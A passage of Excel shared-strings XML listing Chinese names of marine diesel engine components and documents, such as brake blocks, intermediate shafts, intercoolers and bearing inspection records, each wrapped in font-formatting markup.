      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动空气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块，后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动块，前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动盘轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部操纵侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部操纵侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部后侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部后侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部排气侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部排气侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中部走台支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中层操纵侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中层走台支架，管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间板，油底壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间部件的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间法兰，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>及安全块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间架总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间块总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间块组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间框架安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间冷却水套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间盘的轴销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间箱体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间支承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴用齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间轴装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中冷器壳体安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中冷器起吊工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心润滑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中心伺服套管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却高温系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却水系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要及辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央润滑控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重力供油箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力发信器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重量弹性数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴，带工具端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴？和轴承机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承，部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承安装部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承负荷测量生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承滚针</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承和循环油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承及循环油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承间隙质量控制，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>MC-S</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承监测，减速</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承监测系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承监测系统，电缆槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查，销和轴颈上的损坏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>记录观察</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查记录，空白页</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查记录，示例</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在系统中本地损坏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承警报</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承壳体螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承密封油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承磨损工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
